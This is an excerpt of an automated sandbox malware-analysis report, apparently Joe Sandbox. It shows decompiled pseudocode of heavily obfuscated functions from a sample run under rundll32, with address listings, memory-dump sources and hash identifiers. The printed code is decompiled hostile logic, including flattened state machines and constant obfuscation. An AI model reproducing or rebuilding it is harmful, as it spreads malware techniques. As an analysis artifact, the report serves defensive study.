                                                                                                                      								_t631 =  &(_t631[0xd]);
                                                                                                                      								__eflags = _t531;
                                                                                                                      								_t625 = 0xd26443e;
                                                                                                                      								_t471 = _t531 == 0;
                                                                                                                      								__eflags = _t471;
                                                                                                                      								_v1568 = 0 | _t471;
                                                                                                                      								goto L17;
                                                                                                                      							} else {
                                                                                                                      								if(_t625 == 0x971d92c) {
                                                                                                                      									_push(_t568);
                                                                                                                      									E002BEA7B( &_v520, _v1696, _v1616, _t568, _v1572, _v1732, _v1628);
                                                                                                                      									_t631 =  &(_t631[7]);
                                                                                                                      									_t625 = 0xf5a31c5;
                                                                                                                      									goto L1;
                                                                                                                      								} else {
                                                                                                                      									if(_t625 == 0x9b520f4) {
                                                                                                                      										_t551 =  *0x2d520c; // 0x0
                                                                                                                      										_t552 = _t551 + 0x220;
                                                                                                                      										while(1) {
                                                                                                                      											__eflags =  *_t552 - _t568;
                                                                                                                      											if(__eflags == 0) {
                                                                                                                      												break;
                                                                                                                      											}
                                                                                                                      											_t552 = _t552 + 2;
                                                                                                                      											__eflags = _t552;
                                                                                                                      										}
                                                                                                                      										_t550 = _t552 + 2;
                                                                                                                      										_t625 = 0xaa323c9;
                                                                                                                      										goto L2;
                                                                                                                      									} else {
                                                                                                                      										if(_t625 == 0xaa323c9) {
                                                                                                                      											_push(_v1636);
                                                                                                                      											_push(_v1604);
                                                                                                                      											_t572 = _v1580;
                                                                                                                      											_push(0x2b118c);
                                                                                                                      											__eflags = E002B8786(_v1756, _v1668, _v1580,  &_v1564, _v1588, E002BAB66(_v1580, _v1668, __eflags), _v1584, _v1760, _v1580, _t572, _v1704, _v1644, _v1596, _t572, _v1736);
                                                                                                                      											_t625 =  ==  ? 0xdd30c3 : 0x546d466;
                                                                                                                      											E002BAE03(_v1740, _v1748, _v1660, _t534);
                                                                                                                      											_t631 =  &(_t631[0x12]);
                                                                                                                      											L17:
                                                                                                                      											_t526 = 0xdd30c3;
                                                                                                                      											_t568 = 0x5c;
                                                                                                                      											goto L18;
                                                                                                                      										} else {
                                                                                                                      											if(_t625 == 0xd26443e) {
                                                                                                                      												E002B7AF8(_v1700, _v1692, _v1564, _v1632, _v1640);
                                                                                                                      											} else {
                                                                                                                      												_t640 = _t625 - 0xf5a31c5;
                                                                                                                      												if(_t625 != 0xf5a31c5) {
                                                                                                                      													goto L18;
                                                                                                                      												} else {
                                                                                                                      													_push(_v1728);
                                                                                                                      													_push(_v1752);
                                                                                                                      													_push(0x2b10fc);
                                                                                                                      													_t540 = E002BAB66(_v1712, _v1620, _t640);
                                                                                                                      													E002CC66E( &_v1040, _t640);
                                                                                                                      													_t544 =  *0x2d520c; // 0x0
                                                                                                                      													_t546 =  *0x2d520c; // 0x0
                                                                                                                      													_t427 =  &_v1684; // 0xe63f3d4e
                                                                                                                      													E002CBDB5( &_v1560, _t640, _v1744,  *_t427, _v1576, _v1612, _t546 + 0x220, _v1624, _v1688, _t544 + 8,  &_v1040,  &_v520, _t540);
                                                                                                                      													E002BAE03(_v1676, _v1720, _v1652, _t540);
                                                                                                                      													_t631 =  &(_t631[0x10]);
                                                                                                                      													_t625 = 0x9b520f4;
                                                                                                                      													while(1) {
                                                                                                                      														L1:
                                                                                                                      														_t568 = 0x5c;
                                                                                                                      														L2:
                                                                                                                      														_t526 = 0xdd30c3;
                                                                                                                      														goto L3;
                                                                                                                      													}
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							L21:
                                                                                                                      							return _v1568;
                                                                                                                      							L18:
                                                                                                                      							__eflags = _t625 - 0x546d466;
                                                                                                                      						} while (__eflags != 0);
                                                                                                                      						goto L21;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      			}



















































































                                                                                                                      0x002cde69
                                                                                                                      0x002cde71
                                                                                                                      0x002cde76
                                                                                                                      0x002cde7e
                                                                                                                      0x002cde86
                                                                                                                      0x002cde91
                                                                                                                      0x002cde99
                                                                                                                      0x002cdea4
                                                                                                                      0x002cdeb1
                                                                                                                      0x002cdebd
                                                                                                                      0x002cdec2
                                                                                                                      0x002cdec9
                                                                                                                      0x002cded8
                                                                                                                      0x002cdedd
                                                                                                                      0x002cdee8
                                                                                                                      0x002cdeeb
                                                                                                                      0x002cdeef
                                                                                                                      0x002cdef7
                                                                                                                      0x002cdf02
                                                                                                                      0x002cdf0d
                                                                                                                      0x002cdf18
                                                                                                                      0x002cdf23
                                                                                                                      0x002cdf2e
                                                                                                                      0x002cdf39
                                                                                                                      0x002cdf49
                                                                                                                      0x002cdf4d
                                                                                                                      0x002cdf51
                                                                                                                      0x002cdf59
                                                                                                                      0x002cdf64
                                                                                                                      0x002cdf6f
                                                                                                                      0x002cdf7a
                                                                                                                      0x002cdf82
                                                                                                                      0x002cdf8a
                                                                                                                      0x002cdf96
                                                                                                                      0x002cdf9b
                                                                                                                      0x002cdf9f
                                                                                                                      0x002cdfa7
                                                                                                                      0x002cdfaf
                                                                                                                      0x002cdfb7
                                                                                                                      0x002cdfbf
                                                                                                                      0x002cdfc7
                                                                                                                      0x002cdfdb
                                                                                                                      0x002cdfe2
                                                                                                                      0x002cdfea
                                                                                                                      0x002cdff5
                                                                                                                      0x002ce000
                                                                                                                      0x002ce00b
                                                                                                                      0x002ce016
                                                                                                                      0x002ce021
                                                                                                                      0x002ce021
                                                                                                                      0x002ce023
                                                                                                                      0x002ce024
                                                                                                                      0x002ce024
                                                                                                                      0x002ce024
                                                                                                                      0x002ce029
                                                                                                                      0x002ce029
                                                                                                                      0x002ce02b
                                                                                                                      0x002ce25d
                                                                                                                      0x002ce264
                                                                                                                      0x002ce267
                                                                                                                      0x002ce269
                                                                                                                      0x002ce26e
                                                                                                                      0x002ce26e
                                                                                                                      0x002ce271
                                                                                                                      0x00000000
                                                                                                                      0x002ce031
                                                                                                                      0x002ce037
                                                                                                                      0x002ce1c5
                                                                                                                      0x002ce1eb
                                                                                                                      0x002ce1f0
                                                                                                                      0x002ce1f3
                                                                                                                      0x00000000
                                                                                                                      0x002ce03d
                                                                                                                      0x002ce043
                                                                                                                      0x002ce1a5
                                                                                                                      0x002ce1ab
                                                                                                                      0x002ce1b6
                                                                                                                      0x002ce1b6
                                                                                                                      0x002ce1b9
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002ce1b3
                                                                                                                      0x002ce1b3
                                                                                                                      0x002ce1b3
                                                                                                                      0x002ce1bb
                                                                                                                      0x002ce1be
                                                                                                                      0x00000000
                                                                                                                      0x002ce049
                                                                                                                      0x002ce04b
                                                                                                                      0x002ce113
                                                                                                                      0x002ce11a
                                                                                                                      0x002ce125
                                                                                                                      0x002ce12c
                                                                                                                      0x002ce179
                                                                                                                      0x002ce195
                                                                                                                      0x002ce198
                                                                                                                      0x002ce19d
                                                                                                                      0x002ce278
                                                                                                                      0x002ce27a
                                                                                                                      0x002ce27f
                                                                                                                      0x00000000
                                                                                                                      0x002ce051
                                                                                                                      0x002ce057
                                                                                                                      0x002ce2ab
                                                                                                                      0x002ce05d
                                                                                                                      0x002ce05d
                                                                                                                      0x002ce063
                                                                                                                      0x00000000
                                                                                                                      0x002ce069
                                                                                                                      0x002ce069
                                                                                                                      0x002ce06d
                                                                                                                      0x002ce07c
                                                                                                                      0x002ce081
                                                                                                                      0x002ce08f
                                                                                                                      0x002ce0aa
                                                                                                                      0x002ce0c5
                                                                                                                      0x002ce0de
                                                                                                                      0x002ce0e9
                                                                                                                      0x002ce101
                                                                                                                      0x002ce106
                                                                                                                      0x002ce109
                                                                                                                      0x002ce021
                                                                                                                      0x002ce021
                                                                                                                      0x002ce023
                                                                                                                      0x002ce024
                                                                                                                      0x002ce024
                                                                                                                      0x00000000
                                                                                                                      0x002ce024
                                                                                                                      0x002ce021
                                                                                                                      0x002ce063
                                                                                                                      0x002ce057
                                                                                                                      0x002ce04b
                                                                                                                      0x002ce043
                                                                                                                      0x002ce037
                                                                                                                      0x002ce2b3
                                                                                                                      0x002ce2c4
                                                                                                                      0x002ce280
                                                                                                                      0x002ce280
                                                                                                                      0x002ce280
                                                                                                                      0x00000000
                                                                                                                      0x002ce28c
                                                                                                                      0x002ce024

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #:-$'$>D&$>D&$FL$JRP$KjL$N=?$YU$[wS$dkY$ppu
                                                                                                                      • API String ID: 0-3845620242
                                                                                                                      • Opcode ID: 90fd9ba933b090ecac2b4e2d189d7c432e51cc165c9e3354cd45aacc09fcc7c4
                                                                                                                      • Instruction ID: 5023e428865424453a418f02b804e83719f7c6142c06bf5351987a7bd4d57621
                                                                                                                      • Opcode Fuzzy Hash: 90fd9ba933b090ecac2b4e2d189d7c432e51cc165c9e3354cd45aacc09fcc7c4
                                                                                                                      • Instruction Fuzzy Hash: 3432F172508380DFD368CF65C94AB8BBBE2FBC4358F108A1DE19986260D7B59959CF03
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E002CEE94(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                      				char _v4;
                                                                                                                      				char _v8;
                                                                                                                      				intOrPtr _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				intOrPtr _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				intOrPtr _v100;
                                                                                                                      				intOrPtr _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				signed int _v172;
                                                                                                                      				signed int _v176;
                                                                                                                      				signed int _v180;
                                                                                                                      				signed int _v184;
                                                                                                                      				signed int _v188;
                                                                                                                      				signed int _v192;
                                                                                                                      				intOrPtr _t445;
                                                                                                                      				void* _t448;
                                                                                                                      				intOrPtr _t453;
                                                                                                                      				signed int _t467;
                                                                                                                      				intOrPtr _t470;
                                                                                                                      				intOrPtr _t471;
                                                                                                                      				void* _t505;
                                                                                                                      				signed int _t512;
                                                                                                                      				signed int _t513;
                                                                                                                      				signed int _t514;
                                                                                                                      				signed int _t515;
                                                                                                                      				signed int _t516;
                                                                                                                      				signed int _t517;
                                                                                                                      				signed int _t518;
                                                                                                                      				signed int _t519;
                                                                                                                      				signed int _t520;
                                                                                                                      				intOrPtr* _t521;
                                                                                                                      				signed int _t524;
                                                                                                                      				intOrPtr _t529;
                                                                                                                      				signed int* _t531;
                                                                                                                      				void* _t533;
                                                                                                                      
                                                                                                                      				_t471 = __ecx;
                                                                                                                      				_push(_a8);
                                                                                                                      				_v104 = __ecx;
                                                                                                                      				_push(_a4);
                                                                                                                      				_v12 = __edx;
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E002BCF25(__edx);
                                                                                                                      				_v124 = 0x410507;
                                                                                                                      				_t531 =  &(( &_v192)[4]);
                                                                                                                      				_v124 = _v124 ^ 0x83a2264d;
                                                                                                                      				_v124 = _v124 >> 0xa;
                                                                                                                      				_t470 = 0;
                                                                                                                      				_t529 = 0;
                                                                                                                      				_t512 = 0x17;
                                                                                                                      				_t524 = 0xd582a45;
                                                                                                                      				_v124 = _v124 * 3;
                                                                                                                      				_v124 = _v124 ^ 0x0062ea59;
                                                                                                                      				_v164 = 0x8ee5f4;
                                                                                                                      				_v164 = _v164 << 0xd;
                                                                                                                      				_v164 = _v164 ^ 0xc2bd4067;
                                                                                                                      				_v164 = _v164 + 0xffffa455;
                                                                                                                      				_v164 = _v164 ^ 0x1e0364bd;
                                                                                                                      				_v116 = 0xd0c3db;
                                                                                                                      				_v116 = _v116 + 0x7244;
                                                                                                                      				_v116 = _v116 + 0xffff5950;
                                                                                                                      				_v116 = _v116 * 0x7d;
                                                                                                                      				_v116 = _v116 ^ 0x65d60932;
                                                                                                                      				_v76 = 0x69c3d0;
                                                                                                                      				_v76 = _v76 + 0x2803;
                                                                                                                      				_v76 = _v76 ^ 0x0109b4af;
                                                                                                                      				_v76 = _v76 ^ 0x016cb6ed;
                                                                                                                      				_v84 = 0x591f9b;
                                                                                                                      				_v84 = _v84 ^ 0x136c22a2;
                                                                                                                      				_v84 = _v84 + 0xbc03;
                                                                                                                      				_v84 = _v84 ^ 0x133eabdb;
                                                                                                                      				_v40 = 0x32843;
                                                                                                                      				_v40 = _v40 + 0x6836;
                                                                                                                      				_v40 = _v40 ^ 0x000a5f7a;
                                                                                                                      				_v96 = 0x3c9c05;
                                                                                                                      				_v96 = _v96 * 0x1a;
                                                                                                                      				_v96 = _v96 ^ 0xb1c6e809;
                                                                                                                      				_v96 = _v96 ^ 0xb7e34fe8;
                                                                                                                      				_v56 = 0xda9312;
                                                                                                                      				_v56 = _v56 / _t512;
                                                                                                                      				_v56 = _v56 ^ 0x0000b271;
                                                                                                                      				_v132 = 0xda0ea8;
                                                                                                                      				_v132 = _v132 | 0xaeef9bf7;
                                                                                                                      				_t513 = 0x71;
                                                                                                                      				_v132 = _v132 / _t513;
                                                                                                                      				_v132 = _v132 ^ 0x01890540;
                                                                                                                      				_v44 = 0x61f218;
                                                                                                                      				_v44 = _v44 + 0xffff41d7;
                                                                                                                      				_v44 = _v44 ^ 0x006fe265;
                                                                                                                      				_v144 = 0x306d33;
                                                                                                                      				_v144 = _v144 + 0xfffff564;
                                                                                                                      				_v144 = _v144 * 0x6e;
                                                                                                                      				_v144 = _v144 + 0xffff469c;
                                                                                                                      				_v144 = _v144 ^ 0x14c9b51d;
                                                                                                                      				_v52 = 0x70de34;
                                                                                                                      				_v52 = _v52 << 3;
                                                                                                                      				_v52 = _v52 ^ 0x038f9e4d;
                                                                                                                      				_v36 = 0x6cb1ac;
                                                                                                                      				_v36 = _v36 + 0x1a54;
                                                                                                                      				_v36 = _v36 ^ 0x00646b3f;
                                                                                                                      				_v152 = 0x976d54;
                                                                                                                      				_v152 = _v152 ^ 0x53b4556c;
                                                                                                                      				_v152 = _v152 ^ 0x5116bac9;
                                                                                                                      				_v152 = _v152 ^ 0x4d195c93;
                                                                                                                      				_v152 = _v152 ^ 0x4f27d4c2;
                                                                                                                      				_v28 = 0x414a88;
                                                                                                                      				_v28 = _v28 | 0x717fc69d;
                                                                                                                      				_v28 = _v28 ^ 0x71799fc5;
                                                                                                                      				_v160 = 0xc7706;
                                                                                                                      				_v160 = _v160 + 0xc91f;
                                                                                                                      				_v160 = _v160 | 0xaa894ceb;
                                                                                                                      				_v160 = _v160 + 0xffffb57b;
                                                                                                                      				_v160 = _v160 ^ 0xaa88db85;
                                                                                                                      				_v168 = 0x67f23c;
                                                                                                                      				_v168 = _v168 ^ 0x8eced2dd;
                                                                                                                      				_v168 = _v168 ^ 0x27c733d3;
                                                                                                                      				_v168 = _v168 ^ 0x736125b9;
                                                                                                                      				_v168 = _v168 ^ 0xda0ef7f2;
                                                                                                                      				_v176 = 0x85bb3;
                                                                                                                      				_v176 = _v176 | 0x89ba1603;
                                                                                                                      				_v176 = _v176 >> 8;
                                                                                                                      				_t514 = 0x6a;
                                                                                                                      				_v176 = _v176 / _t514;
                                                                                                                      				_v176 = _v176 ^ 0x0009ce33;
                                                                                                                      				_v136 = 0xb0a921;
                                                                                                                      				_v136 = _v136 ^ 0x2367151f;
                                                                                                                      				_v136 = _v136 ^ 0x64865221;
                                                                                                                      				_t515 = 0x35;
                                                                                                                      				_v136 = _v136 * 0x3f;
                                                                                                                      				_v136 = _v136 ^ 0x8d2b953d;
                                                                                                                      				_v148 = 0x2df722;
                                                                                                                      				_v148 = _v148 * 0x30;
                                                                                                                      				_v148 = _v148 + 0xd30d;
                                                                                                                      				_v148 = _v148 | 0x68c8f2ae;
                                                                                                                      				_v148 = _v148 ^ 0x68db5c3d;
                                                                                                                      				_v92 = 0xa4f97a;
                                                                                                                      				_v92 = _v92 ^ 0x325a0e28;
                                                                                                                      				_v92 = _v92 + 0x57de;
                                                                                                                      				_v92 = _v92 ^ 0x32f51d21;
                                                                                                                      				_v32 = 0xa83f00;
                                                                                                                      				_v32 = _v32 + 0xffff47e2;
                                                                                                                      				_v32 = _v32 ^ 0x00a2bde7;
                                                                                                                      				_v156 = 0xe5ea35;
                                                                                                                      				_t178 =  &_v156; // 0xe5ea35
                                                                                                                      				_v156 =  *_t178 / _t515;
                                                                                                                      				_v156 = _v156 << 5;
                                                                                                                      				_v156 = _v156 + 0x3621;
                                                                                                                      				_v156 = _v156 ^ 0x008c998d;
                                                                                                                      				_v180 = 0x37bb8c;
                                                                                                                      				_v180 = _v180 ^ 0x8c6790c9;
                                                                                                                      				_t516 = 0x3c;
                                                                                                                      				_v180 = _v180 * 0x44;
                                                                                                                      				_v180 = _v180 | 0x3ef8ecb7;
                                                                                                                      				_v180 = _v180 ^ 0x7ff3e314;
                                                                                                                      				_v88 = 0x10d686;
                                                                                                                      				_v88 = _v88 + 0xffff44b6;
                                                                                                                      				_v88 = _v88 / _t516;
                                                                                                                      				_v88 = _v88 ^ 0x000573bd;
                                                                                                                      				_v64 = 0x2cf4a8;
                                                                                                                      				_v64 = _v64 << 0xb;
                                                                                                                      				_v64 = _v64 + 0xffff4c9b;
                                                                                                                      				_v64 = _v64 ^ 0x67a6f27b;
                                                                                                                      				_v188 = 0x434d7c;
                                                                                                                      				_t218 =  &_v188; // 0x434d7c
                                                                                                                      				_v188 =  *_t218 * 0x14;
                                                                                                                      				_v188 = _v188 + 0xffff53dc;
                                                                                                                      				_v188 = _v188 * 0x58;
                                                                                                                      				_v188 = _v188 ^ 0xce78d82e;
                                                                                                                      				_v48 = 0x39a498;
                                                                                                                      				_v48 = _v48 + 0xd90b;
                                                                                                                      				_v48 = _v48 ^ 0x00328937;
                                                                                                                      				_v172 = 0x329194;
                                                                                                                      				_v172 = _v172 + 0x15c2;
                                                                                                                      				_v172 = _v172 ^ 0x8846dc1f;
                                                                                                                      				_v172 = _v172 + 0x561;
                                                                                                                      				_v172 = _v172 ^ 0x8878b13b;
                                                                                                                      				_v140 = 0x921bc4;
                                                                                                                      				_v140 = _v140 | 0xc689e64a;
                                                                                                                      				_v140 = _v140 >> 0xc;
                                                                                                                      				_v140 = _v140 ^ 0x67a6be9d;
                                                                                                                      				_v140 = _v140 ^ 0x67a0761b;
                                                                                                                      				_v72 = 0xa3a418;
                                                                                                                      				_t517 = 0x26;
                                                                                                                      				_v72 = _v72 * 0x26;
                                                                                                                      				_v72 = _v72 >> 0x10;
                                                                                                                      				_v72 = _v72 ^ 0x0002c06b;
                                                                                                                      				_v108 = 0xd1ae1a;
                                                                                                                      				_v108 = _v108 ^ 0x567f87f9;
                                                                                                                      				_v108 = _v108 | 0x0eb5e220;
                                                                                                                      				_v108 = _v108 ^ 0x558f672f;
                                                                                                                      				_v108 = _v108 ^ 0x0b3c3f9a;
                                                                                                                      				_v80 = 0x5d29a8;
                                                                                                                      				_v80 = _v80 | 0x5a2f4123;
                                                                                                                      				_v80 = _v80 / _t517;
                                                                                                                      				_v80 = _v80 ^ 0x0265326d;
                                                                                                                      				_v184 = 0x50dc21;
                                                                                                                      				_v184 = _v184 + 0xffff863b;
                                                                                                                      				_v184 = _v184 + 0xffff7ebb;
                                                                                                                      				_v184 = _v184 + 0x5f54;
                                                                                                                      				_v184 = _v184 ^ 0x005a5f37;
                                                                                                                      				_v68 = 0x13fcd3;
                                                                                                                      				_v68 = _v68 + 0x7ca8;
                                                                                                                      				_v68 = _v68 >> 3;
                                                                                                                      				_v68 = _v68 ^ 0x000ac947;
                                                                                                                      				_v24 = 0xc2d10f;
                                                                                                                      				_v24 = _v24 + 0xffff657d;
                                                                                                                      				_v24 = _v24 ^ 0x00c52471;
                                                                                                                      				_v192 = 0x48c156;
                                                                                                                      				_v192 = _v192 >> 4;
                                                                                                                      				_t518 = 0x2f;
                                                                                                                      				_v192 = _v192 * 0x2f;
                                                                                                                      				_v192 = _v192 + 0xffffa98f;
                                                                                                                      				_v192 = _v192 ^ 0x00d9c1bc;
                                                                                                                      				_v112 = 0xb16c9;
                                                                                                                      				_v112 = _v112 >> 0xe;
                                                                                                                      				_v112 = _v112 << 0x10;
                                                                                                                      				_v112 = _v112 / _t518;
                                                                                                                      				_v112 = _v112 ^ 0x00028b59;
                                                                                                                      				_v120 = 0x2563ad;
                                                                                                                      				_t519 = 0x30;
                                                                                                                      				_v120 = _v120 / _t519;
                                                                                                                      				_v120 = _v120 + 0xffffe9b6;
                                                                                                                      				_v120 = _v120 >> 8;
                                                                                                                      				_v120 = _v120 ^ 0x000e86e4;
                                                                                                                      				_v60 = 0x629492;
                                                                                                                      				_t520 = 0x32;
                                                                                                                      				_v60 = _v60 / _t520;
                                                                                                                      				_v60 = _v60 << 0xa;
                                                                                                                      				_v60 = _v60 ^ 0x07e42de9;
                                                                                                                      				_v128 = 0x197221;
                                                                                                                      				_v128 = _v128 >> 0xf;
                                                                                                                      				_v128 = _v128 << 1;
	_v128 = _v128 * 0x2e;
	_v128 = _v128 ^ 0x0004057d;
	_t521 = _v16;
	while(1) {
		L1:
		goto L2;
		do {
			while(1) {
				L2:
				_t533 = _t524 - 0x94e79b7;
				if(_t533 > 0) {
					break;
				}
				if(_t533 == 0) {
					_push(_t471);
					_push(_t471);
					_t445 = E002C3512(0x20000);
					_t470 = _t445;
					if(_t470 != 0) {
						_t524 = 0x4150ae2;
						goto L12;
					}
				} else {
					if(_t524 == 0x35d4444) {
						_t453 = E002B2E96(_v148, _v92, _v32, _v116, _v156,  *_t521, _v12);
						_t471 = _v104;
						_t531 =  &(_t531[5]);
						_v20 = _t453;
						_t505 = 0x812254d;
						_t524 =  !=  ? 0x812254d : 0x4f6d4ac;
						continue;
					} else {
						if(_t524 == 0x4150ae2) {
							_push(_t471);
							_push(_t471);
							_t529 = E002C3512(0x2000);
							_t524 =  !=  ? 0xd2f1d9f : 0x98aa4b1;
							goto L12;
						} else {
							if(_t524 == 0x4f6d4ac) {
								_t521 = _t521 + 0x2c;
								asm("sbb esi, esi");
								_t524 = (_t524 & 0xf5c6e621) + 0xd965e23;
								continue;
							} else {
								if(_t524 == 0x53e4020) {
									E002C8CD6(_v164, _t471, _t529, _v108, _v80);
									_t531 =  &(_t531[3]);
									L11:
									_t524 = 0xd965e23;
									L12:
									L13:
									_t471 = _v104;
									goto L1;
								} else {
									if(_t524 == _t505) {
										E002B95C9(_t529,  &_v8, _v180, _v124, _v20, _v88, _v64, _v188);
										_t524 =  !=  ? 0x53e4020 : 0x4f6d4ac;
										E002CE689(_v48, _v172, _v140, _v20, _v72);
										_t531 =  &(_t531[0xa]);
										L28:
										_t471 = _v104;
										_t505 = 0x812254d;
									}
									goto L29;
								}
							}
						}
					}
				}
				goto L30;
			}
			if(_t524 == 0x98aa4b1) {
				E002B68DE(_v112, _v120, _v60, _v128, _t470);
				_t531 =  &(_t531[3]);
				_t524 = 0x34e8be;
				goto L28;
			} else {
				if(_t524 == 0xd2f1d9f) {
					_t473 = _v44;
					_t448 = E002CE9E9(_v44, _v144, _v52,  &_v16, _v36, _v152,  &_v4, _v12, _v28, _t471, _t471, _v160, _t471, _t471, _v168, _t471, _v176, _t471, _t470);
					_t531 =  &(_t531[0x11]);
					if(_t448 == 0) {
						goto L11;
					} else {
						_t467 = E002B5AE2(_t473);
						_t524 = 0x35d4444;
						_v100 = _v16 * 0x2c + _t470;
						_t521 =  >=  ? _t470 : (_t467 & 0x0000001f) * 0x2c + _t470;
						goto L13;
					}
					L31:
				} else {
					if(_t524 == 0xd582a45) {
						_t524 = 0x94e79b7;
						goto L2;
					} else {
						if(_t524 != 0xd965e23) {
							goto L29;
						} else {
							E002B68DE(_v184, _v68, _v24, _v192, _t529);
							_t531 =  &(_t531[3]);
							_t524 = 0x98aa4b1;
							goto L12;
						}
					}
				}
			}
			break;
			L29:
			_t445 = _v100;
		} while (_t524 != 0x34e8be);
		L30:
		return _t445;
		goto L31;
	}
}








































































                                                                                                                      0x002cf36b
                                                                                                                      0x002cf373
                                                                                                                      0x002cf37e
                                                                                                                      0x002cf386
                                                                                                                      0x002cf38e
                                                                                                                      0x002cf396
                                                                                                                      0x002cf39e
                                                                                                                      0x002cf3a6
                                                                                                                      0x002cf3b1
                                                                                                                      0x002cf3c7
                                                                                                                      0x002cf3ce
                                                                                                                      0x002cf3d9
                                                                                                                      0x002cf3e1
                                                                                                                      0x002cf3e9
                                                                                                                      0x002cf3f1
                                                                                                                      0x002cf3f9
                                                                                                                      0x002cf401
                                                                                                                      0x002cf40c
                                                                                                                      0x002cf417
                                                                                                                      0x002cf41f
                                                                                                                      0x002cf42a
                                                                                                                      0x002cf435
                                                                                                                      0x002cf440
                                                                                                                      0x002cf44b
                                                                                                                      0x002cf453
                                                                                                                      0x002cf45d
                                                                                                                      0x002cf460
                                                                                                                      0x002cf464
                                                                                                                      0x002cf46c
                                                                                                                      0x002cf474
                                                                                                                      0x002cf47c
                                                                                                                      0x002cf481
                                                                                                                      0x002cf48e
                                                                                                                      0x002cf492
                                                                                                                      0x002cf49a
                                                                                                                      0x002cf4a6
                                                                                                                      0x002cf4ab
                                                                                                                      0x002cf4b1
                                                                                                                      0x002cf4b9
                                                                                                                      0x002cf4be
                                                                                                                      0x002cf4c6
                                                                                                                      0x002cf4d8
                                                                                                                      0x002cf4db
                                                                                                                      0x002cf4e2
                                                                                                                      0x002cf4ea
                                                                                                                      0x002cf4f5
                                                                                                                      0x002cf4fd
                                                                                                                      0x002cf502
                                                                                                                      0x002cf50b
                                                                                                                      0x002cf50f
                                                                                                                      0x002cf517
                                                                                                                      0x002cf522
                                                                                                                      0x002cf522
                                                                                                                      0x002cf522
                                                                                                                      0x002cf527
                                                                                                                      0x002cf527
                                                                                                                      0x002cf527
                                                                                                                      0x002cf527
                                                                                                                      0x002cf52d
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002cf533
                                                                                                                      0x002cf6ab
                                                                                                                      0x002cf6ac
                                                                                                                      0x002cf6b2
                                                                                                                      0x002cf6b7
                                                                                                                      0x002cf6bd
                                                                                                                      0x002cf6c3
                                                                                                                      0x00000000
                                                                                                                      0x002cf6c3
                                                                                                                      0x002cf539
                                                                                                                      0x002cf53f
                                                                                                                      0x002cf66e
                                                                                                                      0x002cf673
                                                                                                                      0x002cf677
                                                                                                                      0x002cf67c
                                                                                                                      0x002cf68c
                                                                                                                      0x002cf691
                                                                                                                      0x00000000
                                                                                                                      0x002cf545
                                                                                                                      0x002cf54b
                                                                                                                      0x002cf62a
                                                                                                                      0x002cf62b
                                                                                                                      0x002cf636
                                                                                                                      0x002cf646
                                                                                                                      0x00000000
                                                                                                                      0x002cf551
                                                                                                                      0x002cf557
                                                                                                                      0x002cf603
                                                                                                                      0x002cf608
                                                                                                                      0x002cf610
                                                                                                                      0x00000000
                                                                                                                      0x002cf55d
                                                                                                                      0x002cf564
                                                                                                                      0x002cf5e9
                                                                                                                      0x002cf5ee
                                                                                                                      0x002cf5f1
                                                                                                                      0x002cf5f1
                                                                                                                      0x002cf5f6
                                                                                                                      0x002cf5fa
                                                                                                                      0x002cf5fa
                                                                                                                      0x00000000
                                                                                                                      0x002cf566
                                                                                                                      0x002cf568
                                                                                                                      0x002cf599
                                                                                                                      0x002cf5c0
                                                                                                                      0x002cf5ca
                                                                                                                      0x002cf5cf
                                                                                                                      0x002cf7d8
                                                                                                                      0x002cf7d8
                                                                                                                      0x002cf7dc
                                                                                                                      0x002cf7dc
                                                                                                                      0x00000000
                                                                                                                      0x002cf568
                                                                                                                      0x002cf564
                                                                                                                      0x002cf557
                                                                                                                      0x002cf54b
                                                                                                                      0x002cf53f
                                                                                                                      0x00000000
                                                                                                                      0x002cf533
                                                                                                                      0x002cf6d3
                                                                                                                      0x002cf7cb
                                                                                                                      0x002cf7d0
                                                                                                                      0x002cf7d3
                                                                                                                      0x00000000
                                                                                                                      0x002cf6d9
                                                                                                                      0x002cf6df
                                                                                                                      0x002cf772
                                                                                                                      0x002cf779
                                                                                                                      0x002cf77e
                                                                                                                      0x002cf783
                                                                                                                      0x00000000
                                                                                                                      0x002cf789
                                                                                                                      0x002cf78d
                                                                                                                      0x002cf795
